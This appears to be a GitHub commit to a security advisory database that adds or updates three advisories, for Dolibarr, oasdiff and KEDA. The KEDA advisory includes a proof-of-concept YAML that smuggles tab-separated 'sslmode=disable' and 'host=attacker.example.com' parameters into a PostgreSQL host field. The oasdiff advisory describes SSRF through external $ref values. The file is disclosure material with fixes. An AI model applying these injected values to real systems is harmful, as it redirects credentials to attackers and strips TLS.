Skip to content

Commit 1feae2d

Browse files
1 parent 61c4f6b commit 1feae2d

3 files changed

Lines changed: 162 additions & 5 deletions

File tree

advisories/unreviewed/2026/06/GHSA-7fg5-vc77-69fp/GHSA-7fg5-vc77-69fp.json renamed to advisories/github-reviewed/2026/06/GHSA-7fg5-vc77-69fp/GHSA-7fg5-vc77-69fp.json

Lines changed: 30 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -1,11 +1,12 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-7fg5-vc77-69fp",
4-
"modified": "2026-06-01T03:30:26Z",
4+
"modified": "2026-07-07T23:43:39Z",
55
"published": "2026-06-01T03:30:26Z",
66
"aliases": [
77
"CVE-2026-10215"
88
],
9+
"summary": "Dolibarr ERP CRM is vulnerable to Improper Authorization through its Leave Request REST API",
910
"details": "A security vulnerability has been detected in Dolibarr ERP CRM up to 23.0.1. Impacted is the function checkUserAccessToObject of the file htdocs/holiday/class/api_holidays.class.php of the component Leave Request REST API. The manipulation leads to improper authorization. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 23.0.2 is recommended to address this issue. The identifier of the patch is ee93b6f2f9dd0f6aeefe9d718ab3ab0a44326b73. Upgrading the affected component is advised.",
1011
"severity": [
1112
{
@@ -14,10 +15,30 @@
1415
},
1516
{
1617
"type": "CVSS_V4",
17-
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
18+
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
19+
}
20+
],
21+
"affected": [
22+
{
23+
"package": {
24+
"ecosystem": "Packagist",
25+
"name": "dolibarr/dolibarr"
26+
},
27+
"ranges": [
28+
{
29+
"type": "ECOSYSTEM",
30+
"events": [
31+
{
32+
"introduced": "0"
33+
},
34+
{
35+
"last_affected": "15.0.3"
36+
}
37+
]
38+
}
39+
]
1840
}
1941
],
20-
"affected": [],
2142
"references": [
2243
{
2344
"type": "ADVISORY",
@@ -35,6 +56,10 @@
3556
"type": "WEB",
3657
"url": "https://github.com/Dolibarr/dolibarr/commit/ee93b6f2f9dd0f6aeefe9d718ab3ab0a44326b73"
3758
},
59+
{
60+
"type": "PACKAGE",
61+
"url": "https://github.com/Dolibarr/dolibarr"
62+
},
3863
{
3964
"type": "WEB",
4065
"url": "https://github.com/Dolibarr/dolibarr/releases/tag/23.0.2"
@@ -65,8 +90,8 @@
6590
"CWE-266"
6691
],
6792
"severity": "LOW",
68-
"github_reviewed": false,
69-
"github_reviewed_at": null,
93+
"github_reviewed": true,
94+
"github_reviewed_at": "2026-07-07T23:43:39Z",
7095
"nvd_published_at": "2026-06-01T03:16:25Z"
7196
}
7297
}
Lines changed: 74 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,74 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-2jcc-mxv7-p3f9",
4+
"modified": "2026-07-07T23:45:05Z",
5+
"published": "2026-07-07T23:45:05Z",
6+
"aliases": [
7+
"CVE-2026-53508"
8+
],
9+
"summary": "oasdiff does not enforce --allow-external-refs=false on the git-revision load path (SSRF / local file read)",
10+
"details": "## Summary\n\nFrom **v1.13.2** through **v1.18.0**, oasdiff did not enforce `--allow-external-refs=false` (library: `openapi3.Loader.IsExternalRefsAllowed = false`) when loading a spec from a **git revision** (the `rev:path` form, e.g. `main:openapi.yaml`). External `$ref`s were resolved on that load path even when external refs were explicitly disabled, so the mitigation silently did not apply there.\n\n## Impact\n\nA caller who set `--allow-external-refs=false` *specifically to safely process untrusted specs* remained exposed — on the git-revision load path only — to:\n\n- **SSRF** via `$ref: \"http://<internal-host>/…\"`, and\n- **Local file reads** via `$ref: \"/path\"` or `file://`.\n\nAffected callers:\n\n- **CLI:** `oasdiff diff main:openapi.yaml HEAD:openapi.yaml --allow-external-refs=false` (and `breaking` / `changelog` / `summary`, and the `git-diff-driver`) run over untrusted spec content.\n- **Go library consumers** of `github.com/oasdiff/oasdiff/load` that set `IsExternalRefsAllowed = false` and load from a git-revision source via `load.NewSpecInfo`.\n\nThe file and URL load paths correctly enforced the setting; only the git-revision path was affected. Callers that left external refs at the default (`true`) are not in scope for *this* advisory.\n\n## Patches\n\n**v1.18.1** enforces the external-refs policy on the git-revision path (so `--allow-external-refs=false` now blocks external `$ref`s there) and returns a dedicated exit code (`123`) when an external `$ref` is refused.\n\n## Workarounds\n\n- Upgrade to **v1.18.1**, or\n- Avoid the git-revision input form when processing untrusted specs with external refs disabled.\n\n## Notes\n\n- Introduced in **v1.13.2** (#832, which added `$ref`-chain resolution on the git-revision path); fixed in **v1.18.1** (#974, #975).\n- The permissive **default** (`allow-external-refs: true`) and its zero-interaction exposure in CI via the GitHub Action is tracked separately in GHSA-fhj3-7267-7vv5 (oasdiff-action).",
11+
"severity": [
12+
{
13+
"type": "CVSS_V4",
14+
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "github.com/oasdiff/oasdiff"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "1.13.2"
29+
},
30+
{
31+
"fixed": "1.18.1"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 1.18.0"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/oasdiff/oasdiff/security/advisories/GHSA-2jcc-mxv7-p3f9"
45+
},
46+
{
47+
"type": "WEB",
48+
"url": "https://github.com/oasdiff/oasdiff/pull/832"
49+
},
50+
{
51+
"type": "WEB",
52+
"url": "https://github.com/oasdiff/oasdiff/pull/974"
53+
},
54+
{
55+
"type": "WEB",
56+
"url": "https://github.com/oasdiff/oasdiff/pull/975"
57+
},
58+
{
59+
"type": "PACKAGE",
60+
"url": "https://github.com/oasdiff/oasdiff"
61+
}
62+
],
63+
"database_specific": {
64+
"cwe_ids": [
65+
"CWE-693",
66+
"CWE-73",
67+
"CWE-918"
68+
],
69+
"severity": "MODERATE",
70+
"github_reviewed": true,
71+
"github_reviewed_at": "2026-07-07T23:45:05Z",
72+
"nvd_published_at": null
73+
}
74+
}
Lines changed: 58 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,58 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-6w3m-4hhp-775q",
4+
"modified": "2026-07-07T23:44:13Z",
5+
"published": "2026-07-07T23:44:13Z",
6+
"aliases": [
7+
"CVE-2026-53572"
8+
],
9+
"summary": "KEDA has PostgreSQL connection string parameter injection via incomplete whitespace escaping",
10+
"details": "### Summary\n`pkg/scalers/postgresql_scaler.go` builds libpq-style connection strings by concatenating `key=value` pairs separated by spaces. Each tenant-controllable field (`host`, `port`, `userName`, `dbName`, `sslmode`) is passed through `escapePostgreConnectionParameter`:\n```go\nfunc escapePostgreConnectionParameter(str string) string {\n if !strings.Contains(str, \" \") {\n return str // returned as-is for any non-space whitespace\n }\n str = strings.ReplaceAll(str, \"'\", \"\\\\'\")\n return fmt.Sprintf(\"'%s'\", str)\n}\n```\nThe function only escapes when a literal **space** is present. Per libpq/pgx documentation, parameters are also separated by **tabs, newlines, carriage returns, and form feeds**, and backslashes are parsed inside quoted strings. Because those characters are not detected, a tenant-supplied value like `mydb\\tsslmode=disable\\thost=attacker.example.com` splits into additional `key=value` tokens when parsed by pgx, injecting attacker-controlled connection parameters.\n\n### Vulnerable code\n`pkg/scalers/postgresql_scaler.go`, lines 155–164 and 250–257.\n\n### Impact\nTenants with the ability to create a `TriggerAuthentication` or `ScaledObject` that populates any of `host`, `port`, `userName`, `dbName`, `sslmode` can:\n- **Force `sslmode=disable`** on a connection that the cluster owner intended to be TLS-only — silently downgrading to plaintext and enabling on-path MitM.\n- **Redirect the connection to an attacker-controlled host** (`host=...`) to steal the credentials the operator supplies via the `password=` keyword.\n- Append arbitrary libpq runtime parameters (`options=`, `application_name=`, `target_session_attrs=`) to pivot behavior.\n\nNote: the password parameter is appended **last** in `buildConnArray`, which limits but does not eliminate credential exfiltration — injected `host=` still redirects the subsequent `password=` keyword's target.\n\n### Proof of concept\n```yaml\ntriggers:\n- type: postgresql\n metadata:\n host: \"legit.db.svc\\tsslmode=disable\\thost=attacker.example.com\"\n port: \"5432\"\n userName: \"keda\"\n dbName: \"metrics\"\n sslmode: \"require\"\n query: \"SELECT 1\"\n```\nAfter `escapePostgreConnectionParameter` (no space → returned unchanged), the resulting connection string is parsed by pgx into parameters that include `host=attacker.example.com` and `sslmode=disable`.\n\n### Suggested fix\n- Escape / reject any ASCII whitespace (`\\t`, `\\n`, `\\r`, `\\f`, `\\v`, space) and backslash.\n- Prefer the URI form (`postgres://user:pass@host:port/db?sslmode=require`) with proper URL-encoding.\n- Validate each field against an allow-list pattern before use.\n\n### Resources\n- `pkg/scalers/postgresql_scaler.go`\n- libpq connection string parsing: https://www.postgresql.org/docs/current/libpq-connect.html#LIBPQ-CONNSTRING",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "github.com/kedacore/keda/v2"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "2.20.0"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/kedacore/keda/security/advisories/GHSA-6w3m-4hhp-775q"
42+
},
43+
{
44+
"type": "PACKAGE",
45+
"url": "https://github.com/kedacore/keda"
46+
}
47+
],
48+
"database_specific": {
49+
"cwe_ids": [
50+
"CWE-74",
51+
"CWE-89"
52+
],
53+
"severity": "MODERATE",
54+
"github_reviewed": true,
55+
"github_reviewed_at": "2026-07-07T23:44:13Z",
56+
"nvd_published_at": null
57+
}
58+
}

0 commit comments

Comments
 (0)